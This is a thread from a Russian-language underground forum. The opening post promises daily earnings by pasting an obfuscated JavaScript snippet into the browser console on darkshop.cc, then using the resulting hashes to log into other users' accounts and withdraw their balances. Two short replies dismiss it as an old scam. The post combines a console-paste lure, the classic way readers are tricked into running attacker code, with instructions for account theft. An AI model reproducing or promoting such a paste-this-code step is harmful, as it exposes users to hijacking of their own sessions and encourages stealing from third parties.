Зарабатываем от 10к в день

Статус
Закрыто для дальнейших ответов.

Kolfield

New Member
Оценка реакций
0
Здарова, бротхеры. Собственно, с давних времен тусовался на уже бородатых теневиках. Последним моим теневичком стал чих(чих.мс.Кто знает - тот понял). Решил выбираться из приваток и, собственно, выбор пал на вас. Не хочу я создавать глупых тем, испражняться, ради пары плюсов репутации. Хочу сразу и много. Сливаю я красивую темку, которую на одном из крупняков отрабатывают уже сутки. Сливаю не потому что я очень добрый дядя, а наоборот. Хочу много репки, да и темке то жить осталось несколько часов. Не буду много базарить, поэтому перейдём к дельцу

- Изначально нам требуется перейти на сайт darkshop.cc

- Далее открыть js консольку в браузере, что делается следующим образом:

Для браузеров Хром или Оpera - CNTRL + SHIFТ + J
Для браузера Фаерфокс - CNТRL + SНIFТ + К.

- В консольке вводим кодик, который выглядит вот так:

Код:
_0x699b=["\x4F\x6E\x6C\x69\x6E\x65\x20\x4F\x62\x66\x75\x73\x63\x61\x74\x6F\x72"];ja= _0x699b[0];a()
- В случае, если ещё не зафикшено, должна появиться надпись подобная "YUnsYS" и начнут появляться хэши. После перехода по хэшу - авторизуемся под аккаунтом какого нибудь мамонта. На аккаунтах можно найти кучу покупок, типа аккаунтов вк и прочей дряни. Но попадаются и аккаунты с балансом, который мы можем вывести без всяких проблем.
p.s - За пару часов я вывел порядка 2300 рублей, нашёл кучу полезной инфы и туда-сюда :). Собственно, добивайте тему.

STARTS

New Member
Оценка реакций
0
Тема старая и это скам. Даже не думайте это делать

Uno-uno

Member
Оценка реакций
10
Чувак этой теме лет 5, удаляй...

BuriTTo

Legend UFO